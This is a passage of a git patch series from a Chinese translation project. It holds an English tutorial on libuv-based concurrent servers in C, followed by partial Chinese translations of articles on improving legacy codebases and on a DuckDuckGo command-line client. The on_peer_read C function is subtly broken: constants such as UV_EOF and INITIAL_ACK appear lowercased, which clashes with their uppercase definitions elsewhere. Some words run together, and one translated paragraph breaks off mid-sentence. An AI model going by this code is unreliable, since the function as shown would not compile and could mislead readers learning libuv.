(uv_tcp_t*)xmalloc(sizeof(*client)); + int rc; + if ((rc = uv_tcp_init(uv_default_loop(), client)) < 0) { + die("uv_tcp_init failed: %s", uv_strerror(rc)); + } + client->data = NULL; + + if (uv_accept(server_stream, (uv_stream_t*)client) == 0) { + struct sockaddr_storage peername; + int namelen = sizeof(peername); + if ((rc = uv_tcp_getpeername(client, (struct sockaddr*)&peername, + &namelen)) < 0) { + die("uv_tcp_getpeername failed: %s", uv_strerror(rc)); + } + report_peer_connected((const struct sockaddr_in*)&peername, namelen); + + // Initialize the peer state for a new client: we start by sending the peer + // the initial '*' ack. + peer_state_t* peerstate = (peer_state_t*)xmalloc(sizeof(*peerstate)); + peerstate->state = INITIAL_ACK; + peerstate->sendbuf[0] = '*'; + peerstate->sendbuf_end = 1; + peerstate->client = client; + client->data = peerstate; + + // Enqueue the write request to send the ack; when it's done, + // on_wrote_init_ack will be called. The peer state is passed to the write + // request via the data pointer; the write request does not own this peer + // state - it's owned by the client handle. + uv_buf_t writebuf = uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* req = (uv_write_t*)xmalloc(sizeof(*req)); + req->data = peerstate; + if ((rc = uv_write(req, (uv_stream_t*)client, &writebuf, 1, + on_wrote_init_ack)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } else { + uv_close((uv_handle_t*)client, on_client_closed); + } +} +``` + +This code is well commented, but there are a couple of important libuv idioms I'd like to highlight: + +* Passing custom data into callbacks: since C has no closures, this can be challenging. libuv has a void* datafield in all its handle types; these fields can be used to pass user data. For example, note how client->data is made to point to a peer_state_t structure so that the callbacks registered by uv_write and uv_read_start can know which peer data they're dealing with. + +* Memory management: event-driven programming is much easier in languages with garbage collection, because callbacks usually run in a completely different stack frame from where they were registered, making stack-based memory management difficult. It's almost always necessary to pass heap-allocated data to libuv callbacks (except in main, which remains alive on the stack when all callbacks run), and to avoid leaks much care is required about when these data are safe to free(). This is something that comes with a bit of practice [[1]][6]. + +The peer state for this server is: + +``` +typedef struct { + ProcessingState state; + char sendbuf[SENDBUF_SIZE]; + int sendbuf_end; + uv_tcp_t* client; +} peer_state_t; +``` + +It's fairly similar to the state in part 3; we no longer need sendptr, since uv_write will make sure to send the whole buffer it's given before invoking the "done writing" callback. We also keep a pointer to the client for other callbacks to use. Here's on_wrote_init_ack: + +``` +void on_wrote_init_ack(uv_write_t* req, int status) { + if (status) { + die("Write error: %s\n", uv_strerror(status)); + } + peer_state_t* peerstate = (peer_state_t*)req->data; + // Flip the peer state to WAIT_FOR_MSG, and start listening for incoming data + // from this peer. + peerstate->state = WAIT_FOR_MSG; + peerstate->sendbuf_end = 0; + + int rc; + if ((rc = uv_read_start((uv_stream_t*)peerstate->client, on_alloc_buffer, + on_peer_read)) < 0) { + die("uv_read_start failed: %s", uv_strerror(rc)); + } + + // Note: the write request doesn't own the peer state, hence we only free the + // request itself, not the state. + free(req); +} +``` + +Then we know for sure that the initial '*' was sent to the peer, we start listening to incoming data from this peer by calling uv_read_start, which registers a callback (on_peer_read) that will be invoked by the event loop whenever new data is received on the socket from the client: + +``` +void on_peer_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) { + if (nread < 0) { + if (nread != uv_eof) { + fprintf(stderr, "read error: %s\n", uv_strerror(nread)); + } + uv_close((uv_handle_t*)client, on_client_closed); + } else if (nread == 0) { + // from the documentation of uv_read_cb: nread might be 0, which does not + // indicate an error or eof. this is equivalent to eagain or ewouldblock + // under read(2). + } else { + // nread > 0 + assert(buf->len >= nread); + + peer_state_t* peerstate = (peer_state_t*)client->data; + if (peerstate->state == initial_ack) { + // if the initial ack hasn't been sent for some reason, ignore whatever + // the client sends in. + free(buf->base); + return; + } + + // run the protocol state machine. + for (int i = 0; i < nread; ++i) { + switch (peerstate->state) { + case initial_ack: + assert(0 && "can't reach here"); + break; + case wait_for_msg: + if (buf->base[i] == '^') { + peerstate->state = in_msg; + } + break; + case in_msg: + if (buf->base[i] == '$') { + peerstate->state = wait_for_msg; + } else { + assert(peerstate->sendbuf_end < sendbuf_size); + peerstate->sendbuf[peerstate->sendbuf_end++] = buf->base[i] + 1; + } + break; + } + } + + if (peerstate->sendbuf_end > 0) { + // we have data to send. the write buffer will point to the buffer stored + // in the peer state for this client. + uv_buf_t writebuf = + uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); + uv_write_t* writereq = (uv_write_t*)xmalloc(sizeof(*writereq)); + writereq->data = peerstate; + int rc; + if ((rc = uv_write(writereq, (uv_stream_t*)client, &writebuf, 1, + on_wrote_buf)) < 0) { + die("uv_write failed: %s", uv_strerror(rc)); + } + } + } + free(buf->base); +} +``` + +The runtime behavior of this server is very similar to the event-driven servers of part 3: all clients are handled concurrently in a single thread. Also similarly, a certain discipline has to be maintained in the server's code: the server's logic is implemented as an ensemble of callbacks, and long-running operations are a big no-no since they block the event loop. Let's explore this issue a bit further. + +### Long-running operations in event-driven loops + +The single-threaded nature of event-driven code makes it very susceptible to a common issue: long-running code blocks the entire loop. Consider this program: + +``` +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +int main(int argc, const char** argv) { + uv_timer_t timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +It runs a libuv event loop with a single registered callback: on_timer, which is invoked by the loop every second. The callback reports a timestamp, and once in a while simulates some long-running task by sleeping for 3 seconds. Here's a sample run: + +``` +$ ./uv-timer-sleep-demo +on_timer [4840 ms] +on_timer [5842 ms] +on_timer [6843 ms] +on_timer [7844 ms] +Sleeping... +on_timer [11845 ms] +on_timer [12846 ms] +Sleeping... +on_timer [16847 ms] +on_timer [17849 ms] +on_timer [18850 ms] +... +``` + +on_timer dutifully fires every second, until the random sleep hits in. At that point, on_timer is not invoked again until the sleep is over; in fact,  _no other callbacks_  will be invoked in this time frame. The sleep call blocks the current thread, which is the only thread involved and is also the thread the event loop uses. When this thread is blocked, the event loop is blocked. + +This example demonstrates why it's so important for callbacks to never block in event-driven calls, and applies equally to Node.js servers, client-side Javascript, most GUI programming frameworks, and many other asynchronous programming models. + +But sometimes running time-consuming tasks is unavoidable. Not all tasks have asynchronous APIs; for example, we may be dealing with some library that only has a synchronous API, or just have to perform a potentially long computation. How can we combine such code with event-driven programming? Threads to the rescue! + +### Threads for "converting" blocking calls into asynchronous calls + +A thread pool can be used to turn blocking calls into asynchronous calls, by running alongside the event loop and posting events onto it when tasks are completed. Here's how it works, for a given blocking function do_work(): + +1. Instead of directly calling do_work() in a callback, we package it into a "task" and ask the thread pool to execute the task. We also register a callback for the loop to invoke when the task has finished; let's call iton_work_done(). + +2. At this point our callback can return and the event loop keeps spinning; at the same time, a thread in the pool is executing the task. + +3. Once the task has finished executing, the main thread (the one running the event loop) is notified and on_work_done() is invoked by the event loop. + +Let's see how this solves our previous timer/sleep example, using libuv's work scheduling API: + +``` +void on_after_work(uv_work_t* req, int status) { + free(req); +} + +void on_work(uv_work_t* req) { + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + uv_work_t* work_req = (uv_work_t*)malloc(sizeof(*work_req)); + uv_queue_work(uv_default_loop(), work_req, on_work, on_after_work); +} + +int main(int argc, const char** argv) { + uv_timer_t timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +Instead of calling sleep directly in on_timer, we enqueue a task, represented by a handle of type work_req [[2]][14], the function to run in the task (on_work) and the function to invoke once the task is completed (on_after_work). on_workis where the "work" (the blocking/time-consuming operation) happens. Note a crucial difference between the two callbacks passed into uv_queue_work: on_work runs in the thread pool, while on_after_work runs on the main thread which also runs the event loop - just like any other callback. + +Let's see this version run: + +``` +$ ./uv-timer-work-demo +on_timer [89571 ms] +on_timer [90572 ms] +on_timer [91573 ms] +on_timer [92575 ms] +Sleeping... +on_timer [93576 ms] +on_timer [94577 ms] +Sleeping... +on_timer [95577 ms] +on_timer [96578 ms] +on_timer [97578 ms] +... +``` + +The timer ticks every second, even though the sleeping function is still invoked; sleeping is now done on a separate thread and doesn't block the event loop. + +### A primality-testing server, with exercises + +Since sleep isn't a very exciting way to simulate work, I've prepared a more comprehensive example - a server that accepts numbers from clients over a socket, checks whether these numbers are prime and sends back either "prime" or "composite". The full [code for this server is here][15] - I won't post it here since it's long, but will rather give readers the opportunity to explore it on their own with a couple of exercises. + +The server deliberatly uses a naive primality test algorithm, so for large primes it can take quite a while to return an answer. On my machine it takes ~5 seconds to compute the answer for 2305843009213693951, but YMMV. + +Exercise 1: the server has a setting (via an environment variable named MODE) to either run the primality test in the socket callback (meaning on the main thread) or in the libuv work queue. Play with this setting to observe the server's behavior when multiple clients are connecting simultaneously. In blocking mode, the server will not answer other clients while it's computing a big task; in non-blocking mode it will. + +Exercise 2: libuv has a default thread-pool size, and it can be configured via an environment variable. Can you use multiple clients to discover experimentally what the default size is? Having found the default thread-pool size, play with different settings to see how it affects the server's responsiveness under heavy load. + +### Non-blocking file-system operations using work queues + +Delegating potentially-blocking operations to a thread pool isn't good for just silly demos and CPU-intensive computations; libuv itself makes heavy use of this capability in its file-system APIs. This way, libuv accomplishes the superpower of exposing the file-system with an asynchronous API, in a portable way. + +Let's take uv_fs_read(), for example. This function reads from a file (represented by a uv_fs_t handle) into a buffer [[3]][16], and invokes a callback when the reading is completed. That is, uv_fs_read() always returns immediately, even if the file sits on an NFS-like system and it may take a while for the data to get to the buffer. In other words, this API is asynchronous in the way other libuv APIs are. How does this work? + +At this point we're going to look under the hood of libuv; the internals are actually fairly straightforward, and it's a good exercise. Being a portable library, libuv has different implementations of many of its functions for Windows and Unix systems. We're going to be looking at src/unix/fs.c in the libuv source tree. + +The code for uv_fs_read is: + +``` +int uv_fs_read(uv_loop_t* loop, uv_fs_t* req, + uv_file file, + const uv_buf_t bufs[], + unsigned int nbufs, + int64_t off, + uv_fs_cb cb) { + if (bufs == NULL || nbufs == 0) + return -EINVAL; + + INIT(READ); + req->file = file; + + req->nbufs = nbufs; + req->bufs = req->bufsml; + if (nbufs > ARRAY_SIZE(req->bufsml)) + req->bufs = uv__malloc(nbufs * sizeof(*bufs)); + + if (req->bufs == NULL) { + if (cb != NULL) + uv__req_unregister(loop, req); + return -ENOMEM; + } + + memcpy(req->bufs, bufs, nbufs * sizeof(*bufs)); + + req->off = off; + POST; +} +``` + +It may seem puzzling at first, because it defers the real work to the INIT and POST macros, with some local variable setup for POST. This is done to avoid too much code duplication within the file. + +The INIT macro is: + +``` +#define INIT(subtype) \ + do { \ + req->type = UV_FS; \ + if (cb != NULL) \ + uv__req_init(loop, req, UV_FS); \ + req->fs_type = UV_FS_ ## subtype; \ + req->result = 0; \ + req->ptr = NULL; \ + req->loop = loop; \ + req->path = NULL; \ + req->new_path = NULL; \ + req->cb = cb; \ + } \ + while (0) +``` + +It sets up the request, and most importantly sets the req->fs_type field to the actual FS request type. Since uv_fs_read invokes INIT(READ), it means req->fs_type gets assigned the constant UV_FS_READ. + +The POST macro is: + +``` +#define POST \ + do { \ + if (cb != NULL) { \ + uv__work_submit(loop, &req->work_req, uv__fs_work, uv__fs_done); \ + return 0; \ + } \ + else { \ + uv__fs_work(&req->work_req); \ + return req->result; \ + } \ + } \ + while (0) +``` + +What it does depends on whether the callback is NULL. In libuv file-system APIs, a NULL callback means we actually want to perform the operation  _synchronously_ . In this case POST invokes uv__fs_work directly (we'll get to what this function does in just a bit), whereas for a non-NULL callback, it submits uv__fs_work as a work item to the work queue (which is the thread pool), and registers uv__fs_done as the callback; that function does a bit of book-keeping and invokes the user-provided callback. + +If we look at the code of uv__fs_work, we'll see it uses more macros to route work to the actual file-system call as needed. In our case, for UV_FS_READ the call will be made to uv__fs_read, which (at last!) does the reading using regular POSIX APIs. This function can be safely implemented in a  _blocking_  manner, since it's placed on a thread-pool when called through the asynchronous API. + +In Node.js, the fs.readFile function is mapped to uv_fs_read. Thus, reading files can be done in a non-blocking fashion even though the underlying file-system API is blocking. + +* * * + + +[[1]][1] To ensure that this server doesn't leak memory, I ran it under Valgrind with the leak checker enabled. Since servers are often designed to run forever, this was a bit challenging; to overcome this issue I've added a "kill switch" to the server - a special sequence received from a client makes it stop the event loop and exit. The code for this is in theon_wrote_buf handler. + + +[[2]][2] Here we don't use work_req for much; the primality testing server discussed next will show how it's used to pass context information into the callback. + + +[[3]][3] uv_fs_read() provides a generalized API similar to the preadv Linux system call: it takes multiple buffers which it fills in order, and supports an offset into the file. We can ignore these features for the sake of our discussion. + + +-------------------------------------------------------------------------------- + +via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ + +作者:[Eli Bendersky ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://eli.thegreenplace.net/ +[1]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id1 +[2]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id2 +[3]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id3 +[4]:https://eli.thegreenplace.net/tag/concurrency +[5]:https://eli.thegreenplace.net/tag/c-c +[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4 +[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ +[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ +[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[12]:http://libuv.org/ +[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c +[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5 +[15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c +[16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 +[17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ From 7bee72d850bb42f37a08ebbe09082b563718b177 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 10:42:15 -0500 Subject: [PATCH 0096/1627] translation request --- .../tech/20171130 Search DuckDuckGo from the Command Line.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md index a54c292924..4ee4fecf37 100644 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -1,3 +1,5 @@ +yixunx translating + # Search DuckDuckGo from the Command Line ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) From 76fb4130627f2bbade0d804a0ae2feca71948f6e Mon Sep 17 00:00:00 2001 From: Unknown Date: Fri, 1 Dec 2017 00:38:20 +0800 Subject: [PATCH 0097/1627] =?UTF-8?q?20171201=2000=EF=BC=9A38?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 20171201 00:38 --- ...170530 How to Improve a Legacy Codebase.md | 41 ++++++++++++++----- 1 file changed, 30 insertions(+), 11 deletions(-) diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/sources/tech/20170530 How to Improve a Legacy Codebase.md index 7e2b257949..cc1bd073a9 100644 --- a/sources/tech/20170530 How to Improve a Legacy Codebase.md +++ b/sources/tech/20170530 How to Improve a Legacy Codebase.md @@ -18,65 +18,84 @@ I’ve been (un)fortunate enough to be in this situation several times and me an ### Backup ### 备份 -在你去做任何事情之前备份与之相关的所有东西。这样可以确保不会丢失任何信息,这些信息可能会在一些地方很重要, +在你去做任何操作之前备份与之相关的所有文件。这样可以确保不会丢失任何信息,这些信息可能会在另外一些地方很重要。一旦改变其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,而且不要轻易动他除非这些文件是只读模式。 Before you start to do anything at all make a backup of  _everything_  that might be relevant. This to make sure that no information is lost that might be of crucial importance somewhere down the line. All it takes is a silly question that you can’t answer to eat up a day or more once the change has been made. Especially configuration data is susceptible to this kind of problem, it is usually not versioned and you’re lucky if it is taken along in the periodic back-up scheme. So better safe than sorry, copy everything to a very safe place and never ever touch that unless it is in read-only mode. ### Important pre-requisite, make sure you have a build process and that it actually produces what runs in production +### 你必须确认他们能够在生产环境下构建运行并产出,这是重要的先决条件。 +这一步显而易见并且已经很到位的情况下我完全错过了这一步,Hacker News 的众多评论者就会指出并且证明他们是对的:第一步是马上确保你知道在生产环境下运行着什么东西,也意味着你需要去在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境是,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽你最大能力去测试,之后在你足够信任他能够很好的运行的时候将他弄得生产环境下。无论他运行的怎么样都要做好能够马上切换回就版本的准备,并且记录所有情况下的日志,便于接下来不可避免的 “验尸” 。 I totally missed this step on the assumption that it is obvious and likely already in place but many HN commenters pointed this out and they are absolutely right: step one is to make sure that you know what is running in production right now and that means that you need to be able to build a version of the software that is - if your platform works that way - byte-for-byte identical with the current production build. If you can’t find a way to achieve this then likely you will be in for some unpleasant surprises once you commit something to production. Make sure you test this to the best of your ability to make sure that you have all the pieces in place and then, after you’ve gained sufficient confidence that it will work move it to production. Be prepared to switch back immediately to whatever was running before and make sure that you log everything and anything that might come in handy during the - inevitable - post mortem. ### Freeze the DB - +### 冻结数据库 +直到你改善了代码之前尽可能的冻结你的数据库,在你特别熟悉代码库和遗留代码的之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库和数据库一起构建稳固的基础的能力。保持数据库完全不变能够比较新的逻辑代码和旧的逻辑代码造成的影响,如果都像通知的那样就没有什么影响了。 If at all possible freeze the database schema until you are done with the first level of improvements, by the time you have a solid understanding of the codebase and the legacy code has been fully left behind you are ready to modify the database schema. Change it any earlier than that and you may have a real problem on your hand, now you’ve lost the ability to run an old and a new codebase side-by-side with the database as the steady foundation to build on. Keeping the DB totally unchanged allows you to compare the effect your new business logic code has compared to the old business logic code, if it all works as advertised there should be no differences. ### Write your tests - +### 写测试 +在你做任何改变之前,尽可能多的写下端到端测试和集成测试。确保这些测试能够正确的输出并且是在你能够清晰的知道旧的是如何工作的假设之下(准备好应对一些突发状况)。这些测试有两个重要的作用,他们能够在较早的阶段帮助你抛弃一些错误观念,在你写新代码替换旧代码的时候也有一定防护作用。 Before you make any changes at all write as many end-to-end and integration tests as you can. Make sure these tests produce the right output and test any and all assumptions that you can come up with about how you  _think_  the old stuff works (be prepared for surprises here). These tests will have two important functions: they will help to clear up any misconceptions at a very early stage and they will function as guardrails once you start writing new code to replace old code. +自动化测试,如果你也有 CI 的使用经验,请使用它并且确保在你提交代码之后能够快速的完成所有测试。 Automate all your testing, if you’re already experienced with CI then use it and make sure your tests run fast enough to run the full set of tests after every commit. ### Instrumentation and logging - +### 日志监控 +如果线上的旧设备需要添加上监控功能。用一个完全新的数据库,为每一个你能想到事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个时间戳事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你看到打开 APP 的比关闭的多的时候,你知道哪些 APP 是关闭的必须的方法(例如崩溃)。每一个事件你会发现有许多不同种类的联系跟其他的一些事件,通常你争取维持这些固定的关系,除非有一个明显的错误在系统上。你的目标是降低那些错误的事件,最大化哪些计数器在向下到初始化的水平在链条中。(例如:用户试着支付应该得到相同数量的跟支付回调)。 If the old platform is still available for development add instrumentation. Do this in a completely new database table, add a simple counter for every event that you can think of and add a single function to increment these counters based on the name of the event. That way you can implement a time-stamped event log with a few extra lines of code and you’ll get a good idea of how many events of one kind lead to events of another kind. One example: User opens app, User closes app. If two events should result in some back-end calls those two counters should over the long term remain at a constant difference, the difference is the number of apps currently open. If you see many more app opens than app closes you know there has to be a way in which apps end (for instance a crash). For each and every event you’ll find there is some kind of relationship to other events, usually you will strive for constant relationships unless there is an obvious error somewhere in the system. You’ll aim to reduce those counters that indicate errors and you’ll aim to maximize counters further down in the chain to the level indicated by the counters at the beginning. (For instance: customers attempting to pay should result in an equal number of actual payments received). +这是非常简单的点子去翻转每一个后端应用到一个就像真实的薄书系统一样 This very simple trick turns every backend application into a bookkeeping system of sorts and just like with a real bookkeeping system the numbers have to match, as long as they don’t you have a problem somewhere. +在构建一个健康的系统的时候,这个系统是很珍贵的,而且它也是一个好伙伴,仅次于使用源码控制修改系统日志,你可以确认 BUG 出现的位置,以及对多种计数器造成的影响。 This system will over time become invaluable in establishing the health of the system and will be a great companion next to the source code control system revision log where you can determine the point in time that a bug was introduced and what the effect was on the various counters. +我通常保持技术差 5 分钟一次(一小时 12 次),如果你的应用生成了更多或者更少的事件,你应该改变这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 I usually keep these counters at a 5 minute resolution (so 12 buckets for an hour), but if you have an application that generates fewer or more events then you might decide to change the interval at which new buckets are created. All counters share the same database table and so each counter is simply a column in that table. ### Change only one thing at the time +### 一次只修改一处 +不要完全陷入一个陷阱,在提高代码或者平台可用性的同时添加新特性或者是修复 BUG。这会让你头大,现在必须问问你自己每一步操作想要每一步的什么结果并且将会使你早前建立的测试失效。 Do not fall into the trap of improving both the maintainability of the code or the platform it runs on at the same time as adding new features or fixing bugs. This will cause you huge headaches because you now have to ask yourself every step of the way what the desired outcome is of an action and will invalidate some of the tests you made earlier. ### Platform changes - +###改变平台 +如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不会比那更多,所有的业务逻辑和相互依赖跟从前一样保持不变。 If you’ve decided to migrate the application to another platform then do this first  _but keep everything else exactly the same_ . If you want you can add more documentation or tests, but no more than that, all business logic and interdependencies should remain as before. ### Architecture changes - +###改变架构 +接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的去改变代码为更高级的,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是时候让他模块化,大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 The next thing to tackle is to change the architecture of the application (if desired). At this point in time you are free to change the higher level structure of the code, usually by reducing the number of horizontal links between modules, and thus reducing the scope of the code active during any one interaction with the end-user. If the old code was monolithic in nature now would be a good time to make it more modular, break up large functions into smaller ones but leave names of variables and data-structures as they were. - +Hacker News [mannykannot][1] 指出,理所应当的,这一步不总是有必要的,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这个,我应该加上这个,因此这里有一些更新。我非常想添加的是如果你修改高级代码的时候修改了一点点底层代码试着限制只修改一个文件或者一个不恰当的例子一个子系统,所以你尽可能的限制了修改的范围。其他方面你可能有个困难时期去排查你所做的修改。 HN user [mannykannot][1] points - rightfully - out that this is not always an option, if you’re particularly unlucky then you may have to dig in deep in order to be able to make any architecture changes. I agree with that and I should have included it here so hence this little update. What I would further like to add is if you do both do high level changes and low level changes at least try to limit them to one file or worst case one subsystem so that you limit the scope of your changes as much as possible. Otherwise you might have a very hard time debugging the change you just made. ### Low level refactoring - +### 底层代码的重构 +现在,你应该非常理解每一个模块的作用,准备做一些真正的工作吧:重构代码去提高可维护性和让代码准备添加新功能。这将很可能是项目的一部分消耗大部分时间,记录你做的,不要对模块做改变直到你彻底的记录他并且感觉理解了他。很自由的修改变量名和函数名以及数据结构去提高清晰度和统一性,添加测试(情况需要的话,包括单元测试)。 By now you should have a very good understanding of what each module does and you are ready for the real work: refactoring the code to improve maintainability and to make the code ready for new functionality. This will likely be the part of the project that consumes the most time, document as you go, do not make changes to a module until you have thoroughly documented it and feel you understand it. Feel free to rename variables and functions as well as datastructures to improve clarity and consistency, add tests (also unit tests, if the situation warrants them). ### Fix bugs - +### 修改bugs +现在你准备承担真实用户看到的改变,战斗的第一步将是积累了一整年很多的bugs,像往常一样,第一步证实问题仍然存在,对这个结果做个测试然后修复这个bug,你的 CI 和写的端对端测试应该让你安全在你犯了错误由于不太熟悉或者一些额外的事情。 Now you’re ready to take on actual end-user visible changes, the first order of battle will be the long list of bugs that have accumulated over the years in the ticket queue. As usual, first confirm the problem still exists, write a test to that effect and then fix the bug, your CI and the end-to-end tests written should keep you safe from any mistakes you make due to a lack of understanding or some peripheral issue. ### Database Upgrade - +### 升级数据库 +如果在前面的都所谓之后你需要固定和可维护的数据库再一次你有一个选项去改变数据库或者替换数据库用一个不同的完整的,如果这是你打算做的,做到了所有的这些将能够帮助你通过可靠的方式做修改而不会碰到问题,你会完整的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 If required after all this is done and you are on a solid and maintainable codebase again you have the option to change the database schema or to replace the database with a different make/model altogether if that is what you had planned to do. All the work you’ve done up to this point will help to assist you in making that change in a responsible manner without any surprises, you can completely test the new DB with the new code and all the tests in place to make sure your migration goes off without a hitch. ### Execute on the roadmap - +### 按着路线图执行 +祝贺你脱离的困境并且可以准备添加新功能了。 Congratulations, you are out of the woods and are now ready to implement new functionality. ### Do not ever even attempt a big-bang rewrite +### 任何时候都不要企图推翻重写 +推翻重写是那种注定会失败的项目,之一,你是 A big-bang rewrite is the kind of project that is pretty much guaranteed to fail. For one, you are in uncharted territory to begin with so how would you even know what to build, for another, you are pushing  _all_  the problems to the very last day, the day just before you go ‘live’ with your new system. And that’s when you’ll fail, miserably. Business logic assumptions will turn out to be faulty, suddenly you’ll gain insight into why that old system did certain things the way it did and in general you’ll end up realizing that the guys that put the old system together weren’t maybe idiots after all. If you really do want to wreck the company (and your own reputation to boot) by all means, do a big-bang rewrite, but if you’re smart about it this is not even on the table as an option. ### So, the alternative, work incrementally From e6fa1e146e58e7bb5f8d42b6ceb85d4ca6d6e207 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 16:42:14 -0500 Subject: [PATCH 0098/1627] Translated: Search DuckDuckGo from the Command Line --- ...Search DuckDuckGo from the Command Line.md | 60 ++++++++++--------- 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md index 4ee4fecf37..259a8d7248 100644 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -1,45 +1,48 @@ yixunx translating -# Search DuckDuckGo from the Command Line - +# 在命令行中使用DuckDuckGo搜索 ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) -When we showed you how to [search Google from the command line][3] a lot of you to say you use [Duck Duck Go][4], the awesome privacy-focused search engine. -Well, now there’s a tool to search DuckDuckGo from the command line. It’s called [ddgr][6] (pronounced, in my head, as  _dodger_ ) and it’s pretty neat. +此前我们介绍了[如何在命令行中使用 Google 搜索][3]。许多读者反馈说他们平时使用 [Duck Duck Go][4],一个功能强大而且保密性很强的搜索引擎。 -Like [Googler][7], ddgr is totally open-source and totally unofficial. Yup, the app is unaffiliated with DuckDuckGo in any way. So, should it start returning unsavoury search results for innocent terms, make sure you quack in this dev’s direction, and not the search engine’s! +正巧,最近出现了一款能够从命令行搜索 DuckDuckGo 的工具。它叫做 ddgr(我把它读作 _dodger_),非常好用。 -### DuckDuckGo Terminal App +像 [Googler][7] 一样,ddgr 是一个完全开源而且非官方的工具。没错,它并不属于 DuckDuckGo。所以,如果你发现它返回的结果有些奇怪,请先询问这个工具的开发者,而不是搜索引擎的开发者。 + +### DuckDuckGo 命令行应用 ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) -[DuckDuckGo Bangs][8] makes finding stuff on DuckDuckGo super easy (there’s even a bang for  _this_  site) and, dutifully, ddgr supports them. +[DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 -Unlike the web interface, you can specify the number of search results you would like to see per page. It’s more convenient than skimming through 30-odd search results per page. The default interface is carefully designed to use minimum space without sacrificing readability. +和网页版不同的是,你可以更改每页返回多少结果。这比起比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 -`ddgr` has a number of features, including: +`ddgr` 有许多功能和亮点,包括: -* Choose number of search results to fetch +* 更改搜索结果数 -* Support for Bash autocomplete +* 支持 Bash 自动补全 -* Use !bangs +* 使用 DuckDuckGo Bangs -* Open URLs in a browser +* 在浏览器中打开链接 -* “I’m feeling lucky” option +* ”手气不错“选项 -* Filter by time, region, file type, etc +* 基于时间、地区、文件类型等的筛选功能 